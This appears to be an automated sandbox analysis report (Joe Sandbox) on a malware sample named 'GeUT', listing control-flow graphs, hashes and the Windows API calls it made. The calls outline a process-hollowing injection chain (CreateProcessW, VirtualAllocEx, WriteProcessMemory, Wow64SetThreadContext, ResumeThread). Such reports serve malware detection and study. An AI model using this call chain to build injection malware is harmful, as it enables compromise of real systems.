                      • Opcode Fuzzy Hash: fa583399619c6df2be6be38313404fa2a73ce0ac4f56934d93c2a32085b96f0b
                      • Instruction Fuzzy Hash: 32117A7410120FEFEB46FB28F9A4E557BA6FB84344B10AA6DD1049B21DDBB469099FC0

                      Execution Graph

                      Execution Coverage:31.1%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:34
                      Total number of Limit Nodes:2
                      execution_graph 3944 27320f0 VirtualAllocEx 3945 27321a7 3944->3945 3994 2734e40 3995 2734ecd CreateProcessW 3994->3995 3997 2735026 3995->3997 3967 27321f8 3968 27321fa WriteProcessMemory 3967->3968 3970 27322d8 3968->3970 3971 2732338 3972 273233a ResumeThread 3971->3972 3973 27323c0 3972->3973 3974 2735f98 3976 2735fb2 3974->3976 3975 2736001 3976->3975 3979 2736450 3976->3979 3983 27361c8 3976->3983 3981 2736483 3979->3981 3987 2734024 3981->3987 3982 2736677 3982->3976 3985 27361cd 3983->3985 3984 2734024 CreateProcessW 3986 2736677 3984->3986 3985->3984 3986->3976 3988 2736eb0 CreateProcessW 3987->3988 3990 2737096 3988->3990 3991 2731fd8 3992 2731fda ReadProcessMemory 3991->3992 3993 2732097 3992->3993 3998 2731ba8 3999 2731c35 CreateProcessW 3998->3999 4001 2731d8e 3999->4001 4001->4001 4002 2731ec8 4003 2731f26 4002->4003 4004 2731f3b Wow64SetThreadContext 4002->4004 4003->4004 4005 2731f84 4004->4005

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 665 2734e34-2734e3a 666 2734e3e-2734ecb 665->666 667 2734e3c 665->667 669 2734ee2-2734ef0 666->669 670 2734ecd-2734edf 666->670 667->666 671 2734ef2-2734f04 669->671 672 2734f07-2734f43 669->672 670->669 671->672 673 2734f57-2735024 CreateProcessW 672->673 674 2734f45-2734f54 672->674 678 2735026-273502c 673->678 679 273502d-27350ec 673->679 674->673 678->679 689 2735122-273512d 679->689 690 27350ee-2735117 679->690 693 273512e 689->693 690->689 693->693
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02735011
                      Memory Dump Source
                      • Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 493d90b716d78475ae7b8435377a8367076b6e1fee963f04a096e3819392d4a0
                      • Instruction ID: 1fc1e295a0b20e8c687dfb6deab5893f35cff214297c2a064073d27d0da6ddd8
                      • Opcode Fuzzy Hash: 493d90b716d78475ae7b8435377a8367076b6e1fee963f04a096e3819392d4a0
                      • Instruction Fuzzy Hash: 4581D074C00269CFDF21CFA8C940BEEBBF5AB49304F1491AAE508B7221DB709A85CF55

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 695 2735c6c-2735c6e 696 2735c72 695->696 697 2735c70 695->697 698 2735c76-2735d03 696->698 699 2735c74 696->699 697->696 701 2735d05-2735d17 698->701 702 2735d1a-2735d28 698->702 699->698 701->702 703 2735d2a-2735d3c 702->703 704 2735d3f-2735d7b 702->704 703->704 705 2735d8f-2735e5c CreateProcessW 704->705 706 2735d7d-2735d8c 704->706 710 2735e65-2735f24 705->710 711 2735e5e-2735e64 705->711 706->705 721 2735f26-2735f4f 710->721 722 2735f5a-2735f65 710->722 711->710 721->722 726 2735f66 722->726 726->726
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02735E49
                      Memory Dump Source
                      • Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 8f615df0f2aef8215db57eee47c37ef9d8d1909befa3e1f83610e26cd9143b5f
                      • Instruction ID: 3a0775d66312d3748f701e6f162d426c78b2674dd953baf7795c2aec3686ce9f
                      • Opcode Fuzzy Hash: 8f615df0f2aef8215db57eee47c37ef9d8d1909befa3e1f83610e26cd9143b5f
                      • Instruction Fuzzy Hash: 9581C274D00229DFDF21DFA9C940BEDBBB5BB49304F1091AAE509B7221DB709A85CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 727 2731b9c-2731c33 730 2731c35-2731c47 727->730 731 2731c4a-2731c58 727->731 730->731 732 2731c5a-2731c6c 731->732 733 2731c6f-2731cab 731->733 732->733 734 2731cbf-2731d8c CreateProcessW 733->734 735 2731cad-2731cbc 733->735 739 2731d95-2731e54 734->739 740 2731d8e-2731d94 734->740 735->734 750 2731e56-2731e7f 739->750 751 2731e8a-2731e95 739->751 740->739 750->751 755 2731e96 751->755 755->755
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02731D79
                      Memory Dump Source
                      • Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 6b46e9c0e84e0f9bc0cbb96b0e8edd80592edaac0de03547f24588dc707bd0ca
                      • Instruction ID: 95c9b9b244c287145d369dc96f39e7bcc2154c8fc7b4aeb58b31be666e7bd61f
                      • Opcode Fuzzy Hash: 6b46e9c0e84e0f9bc0cbb96b0e8edd80592edaac0de03547f24588dc707bd0ca
                      • Instruction Fuzzy Hash: 7F81C274C00269DFDF21CFA9C940BEDBBF5AB49300F1091AAE509B7261DB719A89CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 756 2736ea4-2736ea6 757 2736eaa 756->757 758 2736ea8 756->758 759 2736eae-2736f3b 757->759 760 2736eac-2736ead 757->760 758->757 761 2736f52-2736f60 759->761 762 2736f3d-2736f4f 759->762 760->759 763 2736f62-2736f74 761->763 764 2736f77-2736fb3 761->764 762->761 763->764 765 2736fc7-2737094 CreateProcessW 764->765 766 2736fb5-2736fc4 764->766 770 2737096-273709c 765->770 771 273709d-273715c 765->771 766->765 770->771 781 2737192-273719d 771->781 782 273715e-2737187 771->782 786 273719e 781->786 782->781 786->786
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 02737081
                      Memory Dump Source
                      • Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 1b199668cfaa2316e8495c84830f8f8af5c8954c39a585d29b667d1bc7ece401
                      • Instruction ID: 7a65c96c6c5997997cadf9cfb2c15c083af24f31bfdfa1597f54381d02cd31b6
                      • Opcode Fuzzy Hash: 1b199668cfaa2316e8495c84830f8f8af5c8954c39a585d29b667d1bc7ece401
                      • Instruction Fuzzy Hash: 6081D3B5C00269DFDF25CFA8C940BEDBBB5BB49300F1091AAE508B7211DB709A85CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 787 2734024-2736f3b 789 2736f52-2736f60 787->789 790 2736f3d-2736f4f 787->790 791 2736f62-2736f74 789->791 792 2736f77-2736fb3 789->792 790->789 791->792 793 2736fc7-2737094 CreateProcessW 792->793 794 2736fb5-2736fc4 792->794 798 2737096-273709c 793->798 799 273709d-273715c 793->799 794->793 798->799 809 2737192-273719d 799->809 810 273715e-2737187 799->810 814 273719e 809->814 810->809 814->814
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 02737081
                      Memory Dump Source
                      • Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: c3f09eae5aaf0ff70c7a824a2b5c43a5d673cf2c16eb08256cbc5b4a95bcab15
                      • Instruction ID: 5448b4bf4dc8b58f9e20c587e6ebb577ec654e6bd02bfc7db08b981bf824e071
                      • Opcode Fuzzy Hash: c3f09eae5aaf0ff70c7a824a2b5c43a5d673cf2c16eb08256cbc5b4a95bcab15
                      • Instruction Fuzzy Hash: 1E81C2B4C00269DFDF25CFA9C944BEDBBB5BB49300F1091AAE508B7261DB709A85CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 815 273614c-2737d73 817 2737d75-2737d87 815->817 818 2737d8a-2737d98 815->818 817->818 819 2737d9a-2737dac 818->819 820 2737daf-2737deb 818->820 819->820 821 2737dff-2737ecc CreateProcessW 820->821 822 2737ded-2737dfc 820->822 826 2737ed5-2737f94 821->826 827 2737ece-2737ed4 821->827 822->821 837 2737f96-2737fbf 826->837 838 2737fca-2737fd5 826->838 827->826 837->838 842 2737fd6 838->842 842->842
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 02737EB9
                      Memory Dump Source
                      • Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: b27b38917190ef9c35d29f840b81b6abaa1ee5e2e1068877ddd2342ca8721dd5
                      • Instruction ID: 8e4128130d27c0c78a63ace4bf31a25eee8f63525e0785299dd2edb9e2a33078
                      • Opcode Fuzzy Hash: b27b38917190ef9c35d29f840b81b6abaa1ee5e2e1068877ddd2342ca8721dd5
                      • Instruction Fuzzy Hash: 9981D0B4C00229CFDF25CFA9C980BEDBBB5BB49304F1091AAE509B7251DB709A85CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 843 2737cdc-2737d73 845 2737d75-2737d87 843->845 846 2737d8a-2737d98 843->846 845->846 847 2737d9a-2737dac 846->847 848 2737daf-2737deb 846->848 847->848 849 2737dff-2737ecc CreateProcessW 848->849 850 2737ded-2737dfc 848->850 854 2737ed5-2737f94 849->854 855 2737ece-2737ed4 849->855 850->849 865 2737f96-2737fbf 854->865 866 2737fca-2737fd5 854->866 855->854 865->866 870 2737fd6 866->870 870->870
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 02737EB9
                      Memory Dump Source
                      • Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 6372f97c4f675b70861d3a43765c7d828b18389ad0b408c8608064fcee36151b
                      • Instruction ID: 8f994130109fb07426a5a8c22673f878e2d9682a8ce1939dc9db9e647f56ef74
                      • Opcode Fuzzy Hash: 6372f97c4f675b70861d3a43765c7d828b18389ad0b408c8608064fcee36151b
                      • Instruction Fuzzy Hash: C481D1B5C00229DFDF25CFA9C980BEDBBB5AB49304F1091AAE508B7251DB709A85CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 871 2731ba8-2731c33 872 2731c35-2731c47 871->872 873 2731c4a-2731c58 871->873 872->873 874 2731c5a-2731c6c 873->874 875 2731c6f-2731cab 873->875 874->875 876 2731cbf-2731d8c CreateProcessW 875->876 877 2731cad-2731cbc 875->877 881 2731d95-2731e54 876->881 882 2731d8e-2731d94 876->882 877->876 892 2731e56-2731e7f 881->892 893 2731e8a-2731e95 881->893 882->881 892->893 897 2731e96 893->897 897->897
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02731D79
                      Memory Dump Source
                      • Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: de5e1cbc0d27bf3f5bb1e74c44017491c39dd0f18e34ab6312e7f8bbcea8503b
                      • Instruction ID: d3e83c8fe357d9df60f98ab30ac0d0143980d91eb84ac3637277186e378a5a1f
                      • Opcode Fuzzy Hash: de5e1cbc0d27bf3f5bb1e74c44017491c39dd0f18e34ab6312e7f8bbcea8503b
                      • Instruction Fuzzy Hash: C781B274C00269DFDF21CFA9C940BDDBBF5AB49300F1091AAE509B7261DB719A89CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 898 2734e40-2734ecb 899 2734ee2-2734ef0 898->899 900 2734ecd-2734edf 898->900 901 2734ef2-2734f04 899->901 902 2734f07-2734f43 899->902 900->899 901->902 903 2734f57-2735024 CreateProcessW 902->903 904 2734f45-2734f54 902->904 908 2735026-273502c 903->908 909 273502d-27350ec 903->909 904->903 908->909 919 2735122-273512d 909->919 920 27350ee-2735117 909->920 923 273512e 919->923 920->919 923->923
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02735011
                      Memory Dump Source
                      • Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 4cf727d17b2450c67021df46d0cf2bb6a883f879dc30dc85f32f6526f52e96f6
                      • Instruction ID: 33e90d61b8659e8e2027157611b24fa485ba9b9a321c0a7e2ed7cf556e37fd21
                      • Opcode Fuzzy Hash: 4cf727d17b2450c67021df46d0cf2bb6a883f879dc30dc85f32f6526f52e96f6
                      • Instruction Fuzzy Hash: 8781C074C00269CFDF21CFA9C940BDEBBB5AB49304F1491AAE508B7261DB709A85CF55

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 925 2735c78-2735d03 926 2735d05-2735d17 925->926 927 2735d1a-2735d28 925->927 926->927 928 2735d2a-2735d3c 927->928 929 2735d3f-2735d7b 927->929 928->929 930 2735d8f-2735e5c CreateProcessW 929->930 931 2735d7d-2735d8c 929->931 935 2735e65-2735f24 930->935 936 2735e5e-2735e64 930->936 931->930 946 2735f26-2735f4f 935->946 947 2735f5a-2735f65 935->947 936->935 946->947 951 2735f66 947->951 951->951
                      APIs
                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02735E49
                      Memory Dump Source
                      • Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 9feb691a485222aa70148ce94c55189624e7ddf432cc0f9393214960da16464f
                      • Instruction ID: 901fa7cd6a22b34248616ff4da0650aea824cd5858dd5a430453184bb4f84dcd
                      • Opcode Fuzzy Hash: 9feb691a485222aa70148ce94c55189624e7ddf432cc0f9393214960da16464f
                      • Instruction Fuzzy Hash: FA81B174D00229DFDF21CFA9C980BDEBBF5AB49300F1091AAE509B7261DB709A85CF54
                      APIs
                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 027322C6
                      Memory Dump Source
                      • Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: 38e2b493c2ff438af7fc381a16fbb12032ce8f7d1f3fcfbe565d6a3870180aed
                      • Instruction ID: c2e388024a41454944cb4632a7ccc64102cdcf821f89a8b81384f299b9bcfae5
                      • Opcode Fuzzy Hash: 38e2b493c2ff438af7fc381a16fbb12032ce8f7d1f3fcfbe565d6a3870180aed
                      • Instruction Fuzzy Hash: 554198B5D002589FCF01CFA9D984AEEFBF1BB49314F24902AE918B7211D374AA45CB64
                      APIs
                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 027322C6
                      Memory Dump Source
                      • Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: 14355e922fb7ada4d126933d69ab15fa15fa626517edf104e40d6635d2062f4d
                      • Instruction ID: f831381d4f0f0a59de23f304b561fc1d358b6d20782bfeabe5d74edbd60655a9
                      • Opcode Fuzzy Hash: 14355e922fb7ada4d126933d69ab15fa15fa626517edf104e40d6635d2062f4d
                      • Instruction Fuzzy Hash: B14167B5D042589FCB00CFA9D984ADEFBF1BB49314F24902AE818B7211D375AA45CB64
                      APIs
                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02732085
                      Memory Dump Source
                      • Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      • Opcode ID: 6f47055cd694273b724005ab142515bae52289b06f1d86c5db667de8458bf242
                      • Instruction ID: ce19242c2dee0ec9f9912422ae6baf01a72c1505fc885f0cf6e0be7de038656e
                      • Opcode Fuzzy Hash: 6f47055cd694273b724005ab142515bae52289b06f1d86c5db667de8458bf242
                      • Instruction Fuzzy Hash: DF4199B9D04258DFCF10CFAAD980ADEFBB1BB19310F10A02AE818B7211D375A945CF65
                      APIs
                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02732195
                      Memory Dump Source
                      • Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 7527af1426b6af317fbace3b98307698ca814b657cb05564601fe9f7169f9bcb
                      • Instruction ID: 37000e490ac31997a2f4749ac50fafa68c2c2504615f6f0f4e563720ac13e189
                      • Opcode Fuzzy Hash: 7527af1426b6af317fbace3b98307698ca814b657cb05564601fe9f7169f9bcb
                      • Instruction Fuzzy Hash: F73176B9D002589FCF10CFA9D980A9EFBB5BB09310F10A02AE914B7311D335A905CFA5
                      APIs
                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02732085
                      Memory Dump Source
                      • Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      • Opcode ID: 54dc1e6b52ac2f4561cc01a3f4958b0d184a919456f0e774ebbe180cad0ebd4a
                      • Instruction ID: c5a5f731f52a5fd82780ed003d750c90adc58d666347f5907377efac0d93bd07
                      • Opcode Fuzzy Hash: 54dc1e6b52ac2f4561cc01a3f4958b0d184a919456f0e774ebbe180cad0ebd4a
                      • Instruction Fuzzy Hash: 583187B9D04258DFCF10CFAAD984ADEFBB1BB09310F10A02AE818B7210D375A945CF65
                      APIs
                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02732195
                      Memory Dump Source
                      • Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 7cb38bc4b12f95b415309750c084fd5aa4052c2ee4d9ccd0d40fd22641d76a38
                      • Instruction ID: e33ce4913d5da77e13895a48a21e52728c798786299affd00749e64ab2add4fc
                      • Opcode Fuzzy Hash: 7cb38bc4b12f95b415309750c084fd5aa4052c2ee4d9ccd0d40fd22641d76a38
                      • Instruction Fuzzy Hash: 603154B9D04258DFCF10CFA9D984A9EFBB5BB09310F10A02AE918B7310D375A945CFA5
                      APIs
                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 02731F72
                      Memory Dump Source
                      • Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: 62af085bc5380cac3eb64e59cefe9e2ad37a70b2f79f84706d8a9747e10d543b
                      • Instruction ID: 25909ecbff8f5111f123457fbd37c022edf1a9de824e795c5d20009fb92078de
                      • Opcode Fuzzy Hash: 62af085bc5380cac3eb64e59cefe9e2ad37a70b2f79f84706d8a9747e10d543b
                      • Instruction Fuzzy Hash: C431CAB5D012599FCB10CFA9D984ADEFBF1BF49314F24902AE418B7250C378AA45CF94
                      APIs
                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 02731F72
                      Memory Dump Source
                      • Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: b4a79fa42a0c4b56098d44fc4b8f885b4a73ff938299a9df4b208916f71095d0
                      • Instruction ID: 1c80e6ffe41526c6e17f4b913ef033916028470eda4e615c53eb5edc41a96ed0
                      • Opcode Fuzzy Hash: b4a79fa42a0c4b56098d44fc4b8f885b4a73ff938299a9df4b208916f71095d0
                      • Instruction Fuzzy Hash: B8319BB5D012599FCB10CFAAD584ADEFBF1BB49314F24902AE418B7310D378AA45CF64
                      APIs
                      • ResumeThread.KERNELBASE(?), ref: 027323AE
                      Memory Dump Source
                      • Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: 94aaf37986ba96f5fc5d6dbc431918f5be7b99d122ea8e22e230ad33f3fade97
                      • Instruction ID: 6ef263cf11dbbc35c1ece0a7fa26cca61276b95631988feb266f56d03692327b
                      • Opcode Fuzzy Hash: 94aaf37986ba96f5fc5d6dbc431918f5be7b99d122ea8e22e230ad33f3fade97
                      • Instruction Fuzzy Hash: DA21CCB9D042189FCB10CFA9D480ADEFBF4BB49310F20901AE918B7311D375A945CFA4
                      APIs
                      • ResumeThread.KERNELBASE(?), ref: 027323AE
                      Memory Dump Source
                      • Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: 565a4cd31955049e0f3f0f9791269794d77851324f3d858a7d990715213d5801
                      • Instruction ID: 5f4ad91e776158ffb66b0623380783b06ee69a017905e68adf9418854144d0b6
                      • Opcode Fuzzy Hash: 565a4cd31955049e0f3f0f9791269794d77851324f3d858a7d990715213d5801
                      • Instruction Fuzzy Hash: 3721B7B9D042189FCB10CFA9D584ADEFBF4BB09320F20906AE818B7311D375A945CFA5
                      Memory Dump Source
                      • Source File: 00000011.00000002.2419319140.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_a8d000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f9f947f71cf259170b82dc155c508fbf108c4b67092fba570aa9e6b6d46aef5a
                      • Instruction ID: a2913d0f5c7a3b8d61b4eb6007d0ceec4cd1663a96ec984a2107499e6177d1a0
                      • Opcode Fuzzy Hash: f9f947f71cf259170b82dc155c508fbf108c4b67092fba570aa9e6b6d46aef5a
                      • Instruction Fuzzy Hash: CB2125B2504208EFDB05EF14D9C0F26BF66FB94324F24857DE9090B296D336D856CBA1
                      Memory Dump Source
                      • Source File: 00000011.00000002.2419319140.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_a8d000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                      • Instruction ID: c5558979674f1d77ed2378497ee03d125e2287d336085ec7b9ab4932c5c90395
                      • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                      • Instruction Fuzzy Hash: 3B11E676504284DFCF15DF10D5C4B16BF72FB94314F24C6A9D8090B256C33AD856CBA1
                      Memory Dump Source
                      • Source File: 00000012.00000002.2448593746.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_18_2_2ff0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 15f60482a1ddedc2fa356c1d8ea87f7f24552b3e483c2b5c9521a4df72c86759
                      • Instruction ID: b7affa5de6c35133f1502543c0533e79fe0f22eaa1ad625014e82dd7a46dc7e3
                      • Opcode Fuzzy Hash: 15f60482a1ddedc2fa356c1d8ea87f7f24552b3e483c2b5c9521a4df72c86759
                      • Instruction Fuzzy Hash: B6516D70A002498FDB49EB79E85896EBFB2FF843407004A2CD556CB2A1EF789D55DF81
                      Memory Dump Source
                      • Source File: 00000012.00000002.2448593746.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_18_2_2ff0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: be92d87329ef0386eb0a728126b3deeaadc05e3867dfda72163d410cc0f2a773
                      • Instruction ID: dc58f1869467482a099e1e86d37daaf8eeb73f13995915c5779cf57892abd1c4
                      • Opcode Fuzzy Hash: be92d87329ef0386eb0a728126b3deeaadc05e3867dfda72163d410cc0f2a773
                      • Instruction Fuzzy Hash: B9915C70B002498FDB45AB79D858A6EBFB2FF89340B10496CD516DB3A1EF749C05CB81
                      Memory Dump Source
                      • Source File: 00000012.00000002.2448593746.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_18_2_2ff0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: eefc072f1a457d1fda9942001ecc84ad1ba4d59e048fe9db31612bd9a557ec5a
                      • Instruction ID: 1101d75945ba70dedab7a439ec489caf5122a3a80135a431560d0e3c868622e2
                      • Opcode Fuzzy Hash: eefc072f1a457d1fda9942001ecc84ad1ba4d59e048fe9db31612bd9a557ec5a
                      • Instruction Fuzzy Hash: C6318971B00B458BEB55BB79882852EBAE2BFC42903108D3DC25BCB794EF749C048F81
                      Memory Dump Source
                      • Source File: 00000012.00000002.2448593746.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_18_2_2ff0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b01b90d4798bc8e4cb5c01504f216be0c5a6959c9250f25cb256a8b221e92e16
                      • Instruction ID: 52b03a8f53a89bcf27c3a0911545ef155ec8eda053e921b89e81ce04ab7a826f
                      • Opcode Fuzzy Hash: b01b90d4798bc8e4cb5c01504f216be0c5a6959c9250f25cb256a8b221e92e16
                      • Instruction Fuzzy Hash: 89215171F002059BEB54ABF9881936FBAEBEFC8750F14842DD64AD7355DD748C014BA1
                      Memory Dump Source
